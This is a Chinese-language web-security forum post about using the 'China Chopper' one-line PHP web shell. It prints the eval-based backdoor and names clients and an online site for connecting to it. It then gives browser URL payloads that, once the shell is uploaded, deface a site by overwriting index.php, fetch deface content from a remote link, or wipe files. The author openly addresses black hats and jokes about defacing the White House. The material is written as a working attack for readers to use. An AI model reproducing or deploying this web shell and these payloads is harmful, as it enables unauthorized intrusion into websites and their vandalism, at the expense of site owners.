• 中文
    • English
  • 注册
  • WEB安全 WEB安全 关注:4 内容:14

    【原创】如何优雅的使用中国菜刀一句话

  • 查看作者
  • 打赏作者
    • WEB安全
    • 老司机
      至尊会员
      官方认证

      想必大家都知道中国菜刀吧那么它的一句话有哪些奇银技巧使用方法呢,OK,今天就在下面说一下

      中国菜刀的PHP一句话代码如下
      <?php @eval($_GET["cmd"]); ?>

      第一种方法如下

      去某百度搜索中国菜刀然后下载中国菜刀的exe程序来链接

      第二种方法就是用安卓版移动菜刀APP

      第三种方法就是用web版在线版的中国菜刀,某百度也能搜到,比如caidao.cnanonymous.net,等......

      第四种方法如下

      当你通过自己的方法把这个 shell 上传了上去之后,不用菜刀,所有操作均在浏览器进行,(这个 WebShell 的操作全部为 php 代码,宝塔默认禁用 php 调用 linux 命令的函数,如 exec)

      1. 挂黑

      您的域名/您的文件名.php?cmd=$myfile = fopen("index.php", "w") or die("Unable to open file!");$txt = "黑页内容";fwrite($myfile, $txt);fclose($myfile);
      您的域名/您的文件名.php?cmd=file_put_contents("index.php",file_get_contents("您的黑页链接"));

      如果您是一位黑帽,一键删除index文件名的文件 ,访问

      您的域名/您的文件名.php?cmd=$myfile = fopen("文件名", "w") or die("Unable to open file!");$txt = "";fwrite($myfile, $txt);fclose($myfile);
      
      即可一键日白宫  [s-61] 
      
      
      OK今天就说那么多由于本人第一次写文章也不知道写什么,后期还希望大家包涵,当然后期我也会录制一些实战视频谢谢大家关注本站。

      请登录之后再进行评论

      登录
    • 发表内容
    • 做任务
    • 实时动态
    • 偏好设置
    • 帖子间隔 侧栏位置: